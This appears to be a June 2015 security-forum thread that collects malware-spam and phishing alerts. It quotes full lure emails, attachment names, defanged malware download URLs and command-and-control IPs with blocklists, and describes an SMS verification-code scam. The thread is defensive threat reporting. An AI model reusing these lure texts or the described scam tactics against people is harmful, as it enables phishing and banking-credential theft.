The attached file Michael.zip contains the 46 kB large file Transfer_blocked.exe. The trojan is known as Trojan.Win32.Generic.pak!cobra, Gen:Variant.Graftor.198120, Trojan.Win32.YY.Gen.4, LooksLike.Win32.Upatre.g (v) or Downloader.Upatre!gen9. At the time of writing, 7 of the 57 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/afa59fea8ed3a059c9de753acc3b98bd70d0ad990f0540f42bede07f945f11da/analysis/
... Behavioural information
TCP connections
64.182.208.183: https://www.virustotal.com/en/ip-address/64.182.208.183/information/
93.93.194.202: https://www.virustotal.com/en/ip-address/93.93.194.202/information/
173.248.29.43: https://www.virustotal.com/en/ip-address/173.248.29.43/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
___
Fake 'CVD Insurance' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/cvd-insurance-documents-attached-lowri-duffield-brightsidegroup-co-uk-word-doc-or-excel-xls-spreadsheet-malware/
18 Jun 2015 - "'CVD Insurance – documents attached' pretending to come from Lowri Duffield <lowri.duffield@ brightsidegroup .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/CVD-Insurance-documents-attached.png
18 June2015: 3098_001.doc - Current Virus total detections: 4/57*
... downloads Dridex banking malware from http ://evolutionfoundationcollege .co.uk/66/71.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/50385aa1722cfd0b98b385a9b1767f594b798bfe56aa00b435f5fdb3645c7736/analysis/1434619773/
** https://www.virustotal.com/en/file/12102cc5107cbb4a2481fba496ecb8d6a646c4a071278e498d0dadbb29182675/analysis/1434619280/
evolutionfoundationcollege .co.uk: 188.121.55.128: https://www.virustotal.com/en/ip-address/188.121.55.128/information/
___
Fake 'Transfer to your account blocked' SPAM – PDF malware
- http://myonlinesecurity.co.uk/transfer-to-your-account-blocked-fake-pdf-malware/
18 Jun 2015 - "'Transfer to your account blocked' coming from random names at random email addresses with a zip attachment is another one from the current bot runs... The email which has random ID numbers that -match- the attachment name looks like:
Transfer has been blocked, details in an attachment.
ID Transfer: 96907740967
Date of formation: Thu, 18 Jun 2015 13:35:45 +0100
18 June 2015: id96907740967_Transfer_details.zip: Extracts to: Transfer_blocked.exe
Current Virus total detections: 3/57*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/fd35711209a8785f035862f8283b2638268b7c3b27ce2c2672a509b87d6f848f/analysis/1434629016/
___
Fake 'banking invoice' SPAM - leads to malware
- http://blog.dynamoo.com/2015/06/malware-spam-nota-fiscal-eletronica-cod.html
18 Jun 2015 - "These Portuguese-language spam pretends to be some sort of banking invoice aim, but instead leads to malware hosted on Google Drive. The target appears to be users in Brazil.
From: sac.contact4e74974737@ bol .com.br
To: mariomarinho@ uol .com.br
Date: 18 June 2015 at 08:46
Subject: NOTA FISCAL ELETRÔNICA COD. 6Uhrae.088693
Signed by: bol .com.br ...
The reference numbers and sender change slightly in each version. I've seen three samples before, each one with a different download location... which leads to a ZIP file named NFe_0185189710250029301785.zip which in turn contains a malicious executable NFe_0185189710250029301785.exe which has a VirusTotal detection rate of 8/57*. Comments in that report indicate that this may be the Spy.Banker trojan. The Malwr report indicates that it downloads components from the following locations:
http ://donwup2015 .com.br/arq/point.php
http ://tynly2015 .com.br/upt/ext.zlib
... These sites are hosted on:
108.167.188.249 (WebsiteWelcome, US)
187.17.111.104 (Universo Online, Brazil)
The VirusTotal report for both these IPs [1] [2] indicates a high level of badness, indicating that they should be -blocked-. Furthermore, Malwr shows that it drops a file with a detection rate of 2/57**...
Recommended blocklist:
108.167.188.249
187.17.111.104 ..."
* https://www.virustotal.com/en/file/207bb94c49a397bddfc230996d6135250255e5e55606498f46590e0b3241b046/analysis/1434618710/
... Behavioural information
TCP connections
1] 108.167.188.249: https://www.virustotal.com/en/ip-address/108.167.188.249/information/
2] 187.17.111.104: https://www.virustotal.com/en/ip-address/187.17.111.104/information/
** https://www.virustotal.com/en/file/e35c9dc53ec0b1f468614584d472656174753635d847238ad2547589f7d5a32c/analysis/1434619879/
:fear: :mad:
AplusWebMaster
2015-06-19, 18:35
FYI...
Fake 'New instructions' SPAM - malicious payload
- http://blog.dynamoo.com/2015/06/malware-spam-new-instructions.html
19 June 2015 - "This rather terse spam comes with a malicious payload:
From: tim [tim@ thramb .com]
Date: 19 June 2015 at 16:40
Subject: New instructions
New instructions payment of US banks, ask to read
Attached is an archive file with the somewhat unusual name of instructions.zip size=19811 which contains a malicious executable named instructions_document.exe. The VirusTotal analysis indicates that this is the Upatre download [detection rate 3/57*]. Automated analysis tools... show traffic to: 93.93.194.202 :13222/C21/UEQUILABOOMBOOM/0/51-SP3/0/MEBEFEBLGBEID ... which is an IP operated by Orion Telekom in Serbia, and also 66.196.63.33 :443 which is Hamilton Telecommunications in the US. A characteristic of this generation of Upatre is that it sends traffic to icanhazip.com which while not malicious in itself is quite a good indicator of infection. In all cases I have seen, Upatre drops the Dyre banking trojan, but I have been unable to obtain a sample.
Recommended blocklist:
93.93.194.202
66.196.63.33 "
* https://www.virustotal.com/en/file/640fe9501d7078b6644604e3ef4d838372f1654c45f75a241fef4e194d5bde85/analysis/1434725207/
... Behavioural information
TCP connections
104.238.141.75: https://www.virustotal.com/en/ip-address/104.238.141.75/information/
93.93.194.202: https://www.virustotal.com/en/ip-address/93.93.194.202/information/
66.196.63.33: https://www.virustotal.com/en/ip-address/66.196.63.33/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
:fear::fear: :mad:
AplusWebMaster
2015-06-22, 14:37
FYI...
Fake 'Shareholder alert' SPAM – PDF malware
- http://myonlinesecurity.co.uk/shareholder-alert-glen-mccoy-fake-pdf-malware/
22 Jun 2015 - "'Shareholder alert' coming from random names and email addresses with a zip attachment is another one from the current bot runs... The email looks like:
Hope this e-mail finds You well. Please note that in 2015 no dividends will be paid due to
resolution of the Board of Directors. Please see attached. Glen McCoy, Partner
22 June 2015: instructions.zip size=21120.zip : Extracts to: instructions_document.exe
Current Virus total detections: 1/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/a9b71614deb53d9ec3a00cd38cbefd7822cb1b9e4dcf5067286cca2b388d596e/analysis/1434971131/
... Behavioural information
TCP connections
64.182.208.183: https://www.virustotal.com/en-gb/ip-address/64.182.208.183/information/
93.93.194.202: https://www.virustotal.com/en-gb/ip-address/93.93.194.202/information/
109.86.226.85: https://www.virustotal.com/en-gb/ip-address/109.86.226.85/information/
88.221.15.80: https://www.virustotal.com/en-gb/ip-address/88.221.15.80/information/
- http://blog.dynamoo.com/2015/06/malware-spam-shareholder-alert.html
22 June 2015
"... Recommended blocklist:
64.111.36.35
93.93.194.202 "
___
Fake 'Tax inspection notification' SPAM - malicious payload
- http://blog.dynamoo.com/2015/06/malware-spam-tax-inspection.html
22 June 2015 - "This -fake- tax notification comes with a malicious payload.
Date: 22 June 2015 at 19:10
Subject: Tax inspection notification
Good day!
Trust this e-mail finds You well.
Please be notified that next week the revenue service is going to organize tax inspections.
That is why we highly recommend You to file the attached form in order to be prepared.
Inspectors are to determine whether You as a taxpayer have settled the correct amount of taxes.
According to our records, the inspectors license No. is 090-96919-5886-935. Please check as it is an important procedure rule.
We may discuss all the related matters by phone: +1 998-497-85. Feel free to contact us.
Bruce Climt,
Tax Advisor
Attached is a file with a malformed ZIP filename of tax_663-20845-0479-435.zip size=18288.zipsize=18288 which contains a malicious executable info_bank_pdf.exe which has a VirusTotal detection rate of 4/57*... Malwr analysis indicates a traffic pattern consistent with the Upatre downloader:
http ://93.93.194.202 :13234/203/HOME/0/51-SP3/0/ELHBEDIBEHGBEHK
http ://93.93.194.202 :13234/203/HOME/41/5/4/ELHBEDIBEHGBEHK
That IP address is the same as seen in this attack earlier today[1] and it belongs to Orion Telekom in Serbia. This VirusTotal report*** also shows traffic to 178.214.221.89 (Optical Systems LLC, Ukraine), and this Hybrid Analysis report[2] also shows traffic to 37.57.144.177 (Triolan, Ukraine). Furthermore, this other Malwr report shows two dropped executables, karetfob.exe [VT 4/57***] and sveezback.exe [VT 15/57****]. The dropped payload will be the Dyre banking trojan.
Recommended blocklist:
93.93.194.202
178.214.221.89
37.57.144.177 "
* https://www.virustotal.com/en/file/94344782386c3c50a5080e9b520a0934a21cdcd952f82aff02e8692f67e92f40/analysis/
** https://www.virustotal.com/en/file/94344782386c3c50a5080e9b520a0934a21cdcd952f82aff02e8692f67e92f40/analysis/
*** https://www.virustotal.com/en/file/5f12ad0aa6c420098b8efb251282792bfff636f2e21f97931117c4b8b512c426/analysis/1434994679/
**** https://www.virustotal.com/en/file/17ec39315de471f1c52d833bf59481d2b4b866b151fe459ca6927b540f957f43/analysis/1434994696/
1] http://blog.dynamoo.com/2015/06/malware-spam-shareholder-alert.html
2] https://www.hybrid-analysis.com/sample/94344782386c3c50a5080e9b520a0934a21cdcd952f82aff02e8692f67e92f40?environmentId=1
___
'Password recovery' SCAM hitting Gmail, Outlook and Yahoo Mail users
- http://net-security.org/secworld.php?id=18537
22 June 2015 - "A simple yet ingenious scam is being used by scammers to compromise accounts of Gmail, Outlook and Yahoo Mail users, Symantec researcher Slawomir Grzonkowski warns*. 'To pull off the attack, the bad guys need to know the target’s email address and mobile number; however, these can be obtained without much effort... The attackers make use of the password recovery feature offered by many email providers, which helps users who have forgotten their passwords gain access to their accounts by, among other options, having a verification code sent to their -mobile- phone.' Once the verification code is sent to the legitimate user's mobile phone, it's followed by a message by the scammer, saying something like: 'Google has detected unusual activity on your account. Please respond with the code sent to your mobile device to stop unauthorized activity.' The victim sends the verification code to the scammers, and they use it to access the email account.
Occasionally, the code is sent too late and doesn't work anymore, so the scammers -reiterate- the need for the code to be sent in. When they finally get access to the email account, they don't shut the real owner out. Instead, they usually add an -alternate- email to the account and set it up so that copies of all messages are forwarded to it. Then they change the password, and send it to victim via SMS ('Thank you for verifying your Google account. Your temporary password is [TEMPORARY PASSWORD]') in order to complete the illusion of legitimacy. 'The cybercriminals carrying out these attacks do not seem to be focused on financial gain such as stealing credit card numbers. They appear to be looking to gather information about their targets and are not targeting users en masse, instead going for specific individuals. The way they operate is similar to the methods used by APT groups'... It's likely that they use those email accounts to gain access to other online accounts tied to them. Users are advised to be suspicious of SMS messages asking about verification codes, especially if they did -not- request one, and check their authenticity directly with their email provider."
* https://www.youtube.com/watch?v=_dj_90TnVbo&feature=youtu.be
Video 2:17
:fear::fear: :mad:
AplusWebMaster
2015-06-23, 17:05
FYI...
Fake 'list of missing documents' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/06/malware-spam-hope-this-e-mail-finds-you.html
23 June 2015 - "This spam comes with a malicious attachment:
Date: 23 June 2015 at 14:14
Subject: Hope this e-mail finds You well
Good day!
Hope this e-mail finds You well.
Please be informed that we received the documents regarding the agreement No. 7232-003 dated from 3rd day of June.
However there are some forms missing.
We made the list of missing documents for Your ease (the list is attached below).
Please kindly check whether these forms are kept in your records.
In case you have any questions here are our contact details: 838-72-99. Feel free to give a call at any time.
Stacey Grimly,
Project Manager
Some of the details vary in each email, but the overall format is the same. So far I have seen two different mis-named attachments:
check.zip size=57747.zipsize=57747
check.zip size=57717.zipsize=57717
The file sizes actually -match- the one listed in the file's name. Because the attachment is not properly named, some ZIP file handlers may fail to deal with them. Equally, the technique may be designed to get the spam past mail filters. Each archive contains a file info_bank_pdf.exe with different checksums and a detection rate of 3/52* or 3/54**. Automated analysis tools... indicate traffic to the following locations:
93.93.194.202 (Orion Telekom, Serbia)
173.216.240.56 (Suddenlink Communications, US)
188.255.169.176 (Orion Telekom, Serbia)
68.190.246.142 (Charter Communications, US)
... Malwr reports... show dropped files named yaxkodila.exe (two versions, VT 5/54*** and 5/55****) plus a file jieduk.exe (VT 8/54)[5].... the VirusTotal analysis also throws up another IP address of: 104.174.123.66 (Time Warner Cable, US). The malware is a common combination of the Upatre downloader and Dyre banking trojan, targeting Windows systems.
Recommended blocklist:
93.93.194.202
173.216.240.56
188.255.169.176
68.190.246.142
104.174.123.66 "
* https://www.virustotal.com/en/file/f2b234b32d236f6114d87e511d7ecbd79ff6ae9b8254f461b48fcfeacf7628d9/analysis/1435063484/
** https://www.virustotal.com/en/file/4117f1a06cde3c01e1e51cecc83689c4ecd93ca49242589cabd57b06a39ecb71/analysis/1435063502/
*** https://www.virustotal.com/en/file/c4c64494b037d8af97f877760453fc87a980413573b760f284a5f42cbcf5ed49/analysis/1435064473/
**** https://www.virustotal.com/en/file/56a36f30bed8b6442ed3703dfcdd7541bd492d641a664472a0cb2e77ed424ccb/analysis/1435064478/
5] https://www.virustotal.com/en/file/df66805b40483140f6628286932b8e5f0cf0ba2424c4afefa53f4d09175453d5/analysis/1435064476/
- http://myonlinesecurity.co.uk/hope-this-e-mail-finds-you-well-stacey-grimly-fake-pdf-malware/#
23 June 2015
- https://www.virustotal.com/en-gb/file/b4d82284af687ee85559c557dbc8a70cf8df43db5f4e821714dc0885ac4dd8cd/analysis/1435062320/
... Behavioural information
TCP connections
104.238.136.31: https://www.virustotal.com/en-gb/ip-address/104.238.136.31/information/
93.93.194.202: https://www.virustotal.com/en-gb/ip-address/93.93.194.202/information/
72.230.82.80: https://www.virustotal.com/en-gb/ip-address/72.230.82.80/information/
___
Fake 'Agreement' SPAM – PDF malware
- http://myonlinesecurity.co.uk/agreement-fake-pdf-malware/
23 June 2015 - "'Agreement' coming from random names and email addresses with a zip attachment is another one from the current bot runs... The email looks like:
Hello,
As per your question please find attached the application form.
Please fill out each detail and returnit back to us via emailsoon as possibleWith this information we will be able to help you resolve this issue.
Thank you.
23 June 2015: new_filling_form.zip: Extracts to: new_application_form.exe
Current Virus total detections: 10/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/20f3aea8e8a3d7ce70f04465ddb0688e5ed4aef89a424c7e83e4c37c84dbe83c/analysis/1435078814/
... Behavioural information
TCP connections
104.238.141.75: https://www.virustotal.com/en-gb/ip-address/104.238.141.75/information/
93.93.194.202: https://www.virustotal.com/en-gb/ip-address/93.93.194.202/information/
216.254.231.11: https://www.virustotal.com/en-gb/ip-address/216.254.231.11/information/
:fear: :mad:
AplusWebMaster
2015-06-24, 15:38
FYI...
Fake 'Hilton Hotels' SPAM – PDF malware
- http://myonlinesecurity.co.uk/a-for-guest-warde-said-hilton-hotels-fake-pdf-malware/
24 June 2015 - "'A for guest WARDE SAID' pretending to come from CTAC_DT_Hotel@ Hilton .com with a zip attachment is another one from the current bot runs... The email looks like:
Thank you for choosing our hotel and we very much hope that you enjoyed your stay with us.
Enclosed is a copy of your receipt(FOLIODETE_9601395.pdf). Should you require any further assistance please do not hesitate to contact us directly.
We look forward to welcoming you back in the near future.
This is an automatically generated message. Please do not reply to this email address...
24June 2015: FOLIODETE_9601395.zip: Extracts to: FOLIODETE_2015_0006_0024.exe
Current Virus total detections: 2/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/6e8cc3ac898a72b83ae53ec1da6e93e2fa9c144a332bc67df87a2c5fdc55b848/analysis/1435142883/
___
Fake 'Considerable law alternations' SPAM - malicious payload
- http://blog.dynamoo.com/2015/06/malware-spam-considerable-law.html
24 June 2015 - "This -fake- legal spam comes with a malicious payload:
Date: Wed, 24 Jun 2015 22:04:09 +0900
Subject: Considerable law alternations
Pursuant to alternations made to the Criminal Code securities have to be reestimated.
Described proceeding is to finish until April 2016.
However shown levy values to be settled last in this year.
Please see the documents above .
Pamela Adams
Chief accountant
In the sample I saw there was an attachment named excerptum_from_the_implemented_rule.zip containing a malicious executable excerptum_from_the_implemented_act.exe which has a VirusTotal detection rate of 2/55*. Automated analysis tools... show malicious traffic to the following IPs:
93.185.4.90 (C2NET Przno, Czech Republic)
216.16.93.250 (Clarity Telecom LLC / PrairieWave, US)
195.34.206.204 (Radionet, Ukraine)
75.98.158.55 (Safelink Internet , US)
185.47.89.141 (Orion Telekom, Serbia)
83.168.164.18 (SWAN, a.s. TRIO network, Slovakia)
85.192.165.229 (Rostelecom / VolgaTelecom, Russia)
178.222.250.35 (Telekom Srbija, Serbia)
The Malwr report and Hybrid Analysis report indicate a couple of dropped files, gebadof.exe (VT 2/55**) and qppwkce.exe (VT 3/55***). This malware appears to be a combination of the Upatre downloader and Dyre banking trojan.
Recommended blocklist:
93.185.4.90
216.16.93.250
195.34.206.204
75.98.158.55
185.47.89.141
83.168.164.18
85.192.165.229
178.222.250.35 "
* https://www.virustotal.com/en/file/63127664ca7015ff7eafc82d8f37a38a97e5537995742cdbf8d63a8e91f490e6/analysis/1435151345/
** https://www.virustotal.com/en/file/63127664ca7015ff7eafc82d8f37a38a97e5537995742cdbf8d63a8e91f490e6/analysis/1435153236/
*** https://www.virustotal.com/en/file/572606aa9bbc705457e1d35d4823b1c25b8b561a01dd2018dc7f94577b86c13f/analysis/1435153268/
___
Fake Bank of America Twitter Feed Leads to Phish ...
- https://blog.malwarebytes.org/fraud-scam/2015/06/fake-bank-of-america-twitter-feed-leads-to-phishing-page/
June 24, 2015 - "Over the last day or so, a Twitter feed claiming to be a support channel for Bank of America has been sending links and messages to anybody having issues with their accounts. Here’s the dubious BoA Twitter account in question:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/boatwitfeed1.jpg
... In most cases, they direct people to a URL where they can supposedly fix their problems, which is
sclgchl1(dot)eu(dot)pn/index(dot)html
They’ve also been seen asking for credentials directly via DM (Direct Message). They appear to be using that classic Twitter -phishing- technique: look for people sending help messages to an official account, then inject themselves into the conversation:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/boatwitfeed2.jpg
Here’s a sample list of messages they’ve been sending to BoA customers:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/boatwitterstorm.jpg
Some things to note: the Twitter account is -not- verified, and the page collecting personal information is not HTTPS secured which is never a good sign where sending banking credentials to someone is concerned. If you land on their page with JavaScript disabled, you’ll be asked to switch it on again:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/boatwitfeed3.jpg
The site asks for the following information: Online ID, Passcode, Account Number, Complete SSN or Tax Identification Number and Passcode. Once all of this information is entered, the victim is redirected to the real Bank of America website... At time of writing, the site is being flagged by Chrome for phishing:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/boatwitfeed7.jpg
We’ve also spotted another page on the same domain which looks like a half-finished Wells Fargo “Security Sign On” page:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/boatwitfeed8.jpg
We advise customers of BoA to be very careful where they’re sending account credentials – note that the official BoA Twitter feed has a -Verified- icon, and that small but crucial detail could make all the difference where keeping your account secure is concerned."
sclgchl1(dot)eu(dot)pn: 83.125.22.211: https://www.virustotal.com/en-gb/ip-address/83.125.22.211/information/
___
Samsung laptops deliberately disable Windows Update with bloatware
- http://www.theinquirer.net/inquirer/news/2414698/samsung-laptops-deliberately-disable-windows-update-with-bloatware
Jun 24 2015 - "... Samsung, in common with a number of manufacturers, has an app for finding the latest drivers and updates to, well, frankly, bloatware. In Samsung's case the app is called SW Updater. Samsung describes it thus: 'Find easy ways to install and maintain the latest software, protect your computer, and back up your music, movies, photos and files'... a teardown from Microsoft MVP Patrick Barker* has revealed that Samsung laptops -include- an executable file called Disable_Windowsupdate.exe which kind of explains itself really. What's really disturbing about this, as if it wasn't enough already, is that if you turn Windows Update back on, SW Updater goes back and turns it back -off- again..."
* http://bsodanalysis.blogspot.in/2015/06/samsung-deliberately-disabling-windows.html
- http://www.neowin.net/news/samsung-cripples-windows-update-to-help-your-settings
Jun 24, 2015
___
Instapaper App vulnerable to Man-in-the-Middle Attacks
- http://labs.bitdefender.com/2015/06/android-instapaper-app-vulnerable-to-man-in-the-middle-attacks/
June 23, 2015 - "... analyzed popular Android app Instapaper and found it can be vulnerable to man-in-the-middle attacks that could expose users’ signup/login credentials when they try to log in into their accounts. The vulnerability may have serious consequences, especially if users have the same password for more than one account, leaving them potentially vulnerable to intrusions.
The Problem: Instapaper allows users to save and store articles for reading, particularly for when they’re offline, on the go, or simply don’t have access to the Internet. The application works by saving most web pages as text only and formatting their layout for tablets or phone screens. Everyone who wants to use the application is required to sign-up and create an account to check out notes, liked articles or access other options. However, the vulnerability lies not in the way the application fetches content, but in the way it implements (or in this case, doesn’t implement) certificate validation. Although the entire communication is handled via HTTPS, the app performs no certificate validation. If someone were to perform a man-in-the-middle attack, he could use a self-signed certificate and start “communicating” with the application...
The Attack: If a user were to sign into his account while connected to a Wi-Fi network that’s being monitored by an attacker, his authentication credentials (both username and password) could easily be intercepted using any fake certificate and a traffic-intercepting tool...
Implications: While the attacker might seem to only gain access to your Instapaper account, most people use the same password for multiple accounts. A cybercriminal could try and use your Instapaper password to access your social media or email accounts. Studies have shown that more than 50% of users reuse the same password, so the chances are -better- than even that more than one account could be vulnerable if your Instapaper credentials have been stolen. We have notified the development team behind the Android Instapaper app about the found vulnerability, but they have yet to confirm when a fix will become available..."
___
SEC hunts hacks who stole corp emails to trade stocks
- http://www.reuters.com/article/2015/06/23/us-hackers-insidertrading-idUSKBN0P31M720150623
Jun 23, 2015 - "U.S. securities regulators are investigating a group of hackers suspected of breaking into corporate email accounts to steal information to trade on, such as confidential details about mergers, according to people familiar with the matter. The Securities and Exchange Commission has asked at least eight listed companies to provide details of their data breaches, one of the people said. The unusual move by the agency reflects increasing concerns about cyber attacks on U.S. companies and government agencies. It is an "absolute first" for the SEC to approach companies about possible breaches in connection with an insider trading probe, said John Reed Stark, a former head of Internet enforcement at the SEC. "The SEC is interested because failures in cybersecurity have prompted a dangerous, new method of unlawful insider trading," said Stark, now a private cybersecurity consultant. According to people familiar with the matter, the SEC's inquiry and a parallel probe by the U.S. Secret Service - which investigates cyber crimes and financial fraud - were spurred by a December report by security company FireEye Inc about a sophisticated hacking group that it dubbed 'FIN4'. Since mid-2013, FIN4 has tried to hack into email accounts at more than 100 companies, looking for confidential information on mergers and other market-moving events. The targets include more than 60 listed companies in biotechnology and other healthcare-related fields, such as medical instruments, hospital equipment and drugs, according to the FireEye report*..."
* https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html
Nov 30, 2014
- http://www.reuters.com/video/2015/06/23/exclusive-sec-hunts-corporate-hackers?videoId=364704066&newsChannel=cyber-crime
Video 2:08
:fear::fear: :mad:
AplusWebMaster
2015-06-25, 15:55
FYI...
Dyre emerges as main financial Trojan threat
- http://www.theregister.co.uk/2015/06/25/dyre_banking_vxers_love_mondays_symantec_says/
25 Jun 2015 - "... the masterminds behind the Dyre banking malware are putting in full five-day working weeks to maintain some -285- command and control servers handling stolen banking credentials. The malware is one of the worst in circulation using its fleet of command and control servers to handle the reams of bank account data blackhats steal using phishing websites. Symantec says* the attacks are confined largely to Europe outside of Russia and Ukraine where most of the command and control servers are located..."
* http://www.symantec.com/connect/app#!/blogs/dyre-emerges-main-financial-trojan-threat
23 Jun 2015 - "... After a number of recent takedowns against major financial threats such as Gameover Zeus, Shylock, and Ramnit, the threat posed by these groups has receded but Dyre has taken their place as one of the main threats to ordinary consumers. Detected by Symantec as Infostealer.Dyre, Dyre targets Windows computers and can steal banking and other credentials by attacking all three major web browsers (Internet Explorer, Chrome, and Firefox). Dyre is a two-pronged threat. Aside from stealing credentials, it can also be used to infect victims with other types of malware, such as adding them to -spam- botnets... the number of Dyre infections began to surge a year ago and the attackers behind this malware have steadily improved its capabilities and continued to build out supporting infrastructure:
Dyre detections over time:
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/Fig1_24.png
... Dyre is mainly spread using spam emails. In most cases the emails masquerade as businesses documents, voicemail, or fax messages. If the victim clicks-on-an-email’s-attachment, they are -redirected- to a malicious website which will install the Upatre downloader on their computer... In many cases, the victim is added to a -botnet- which is then used to power further spam campaigns and infect more victims..."
>> https://www.symantec.com/connect/sites/default/files/users/user-2598031/dyre-infographic_1.jpg
___
Web security subtleties and exploitation of combined vulnerabilities
- https://isc.sans.edu/diary.html?storyid=19837
2015-06-25 - "The goal of a penetration test is to report all identified vulnerabilities to the customer. Of course, every penetration tester puts most of his effort into finding critical security vulnerabilities: SQL injection, XSS and similar, which have the most impact for the tested web application... what we exploit with the XSS vulnerability in the first place: typically the attacker tries to steal cookies in order to gain access to the victim’s session. Since here sessions are irrelevant, the attacker will not use XSS to steal cookies but instead to change what the web page displays to the victim. This can be used for all sorts of -phishing- exploits and, depending on the URL and context of the attack, can be even more devastating than stealing the sessions."
(More detail at the isc URL above.)
___
Fraud Alert Issued on Business Email Compromise Scam
- https://www.us-cert.gov/ncas/current-activity/2015/06/24/Fraud-Alert-Issued-Business-Email-Compromise-Scam
June 24, 2015 - " The Financial Services Information Sharing and Analysis Center (FS-ISAC) and federal law enforcement agencies have released a joint alert warning companies of a sophisticated wire payment scam referred to as business email compromise (BEC). Scammers use fraudulent information to trick companies into directing financial transactions into accounts scammers control. Users and administrators are encouraged to review the BEC Joint Report (link is external*) for details and refer to the US-CERT Tip ST04-014** for information on social engineering and phishing attacks."
* https://www.fsisac.com/sites/default/files/news/BEC_Joint_Product_Final.pdf
** https://www.us-cert.gov/ncas/tips/ST04-014
"... Do not give sensitive information to anyone unless you are sure that they are indeed who they claim to be and that they should have access to the information..."
- http://blogs.cisco.com/security/talos/hook-line-sinker#more-172509
June 24, 2015 - "... Attackers are constantly targeting user data and attempting to trick users into leaking sensitive information through phishing campaigns. These phishing attempts are targeting normal users who represent the customers of the various businesses being targeted. If the emails come through a work email, the user can take advantage of a layered approach to security that will usually indicate these attacks as spam or even malicious. Most home users, however, do not have the same layered security configuration on their home networks. Many of these phish also attempt to try to place time pressure on the user to get them to act quickly and without taking the time to think about what they are doing. Therefore, it is important for users to be constantly vigilant, and to remain -calm- when they receive that cleverly crafted phishing email. Users should always take time to think -before- revealing any sensitive information, whether it is on the phone, via email, or through the web..."
:fear::fear: :mad:
AplusWebMaster
2015-06-26, 16:07
FYI...
Fake 'Xerox Scan' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/scanned-from-a-xerox-multifunction-printer-word-doc-or-excel-xls-spreadsheet-malware/
26 June 2015 - "'Scanned from a Xerox Multifunction Printer' pretending to come from Xerox (random number) @ your own email domain with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please open the attached document. It was scanned and sent to you using a Xerox Multifunction Printer.
Attachment File Type: DOC, Multi-Page
Multifunction Printer Location:
Device Name: XRX9C934E5EEC46 ...
26 June 2015: Scanned from a Xerox Multifunction Printer.doc
Current Virus total detections: 4/56* ... downloads Dridex banking malware from http ://sudburyhive .org/708/346.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/25e247c71cd4a50f5c97e3b69807faa5ac048da050c0180fd881f75d1577fe66/analysis/1435301557/
** https://www.virustotal.com/en-gb/file/2841f3dec7a4485ca6efde0fac2863f9e3ec0af62f7e36e6f835d57e327a4b93/analysis/
... Behavioural information
TCP connections
68.169.49.213: https://www.virustotal.com/en-gb/ip-address/68.169.49.213/information/
88.221.15.80: https://www.virustotal.com/en-gb/ip-address/88.221.15.80/information/
sudburyhive .org: 104.27.172.61: https://www.virustotal.com/en-gb/ip-address/104.27.172.61/information/
104.27.173.61: https://www.virustotal.com/en-gb/ip-address/104.27.173.61/information/
___
Fake 'Vehicle Tax' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/notification-of-vehicle-tax-dd-payment-schedule-ref-000000-000005-274421-001-word-doc-or-excel-xls-spreadsheet-malware/
26 June 2016 - "'Notification of Vehicle Tax DD Payment Schedule (Ref: 000000-000005-274421-001)' pretending to come from directdebit@ taxdisc.service .gov .uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Important: Confirmation of your successful
Direct Debit instruction
Dear customer
Vehicle registration number: FG08OEE
Thank you for arranging to pay the vehicle tax by Direct Debit.
Please can you check that the details attached below, and your payment schedule are correct.
If any of the above financial details are incorrect please contact your bank as soon as possible.
However, if your details are correct you don’t need to do anything and your Direct Debit will be
processed as normal. You have the right to cancel your Direct Debit at any time. A copy of the
Direct Debit Guarantee is included with this letter.
For your information, the collection will be made using this reference, and this is how your
payment will be detailed on your bank statements:
DVLA Identifier: 295402
Reference: FG08OEE
Your vehicle tax will automatically renew unless you notify us of any changes. We will send a new
payment schedule at the time of renewal.
Yours sincerely
Rohan Gye
Vehicles Service Manager
Driver a& Vehicle Licencing Agency logo
26 June 2015 : FG08OEE.doc - Current Virus total detections: 4/55* . This downloads the same Dridex banking malware in exactly the -same- way as today’s other malspam word macro downloader 'Scanned from a Xerox Multifunction Printer' – word doc or excel xls spreadsheet malware** ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/404a73f3cb148dfdd1e75aa498c7a8098352f4014eedf50c77db2c299bf70f24/analysis/1435304855/
** http://myonlinesecurity.co.uk/scanned-from-a-xerox-multifunction-printer-word-doc-or-excel-xls-spreadsheet-malware/
- http://blog.dynamoo.com/2015/06/malware-spam-notification-of-vehicle.html
26 June 2015
werktuigmachines .be: 46.30.212.5: https://www.virustotal.com/en-gb/ip-address/46.30.212.5/information/
___
Fake 'Order Confirmation' SPAM - doc/xls malware
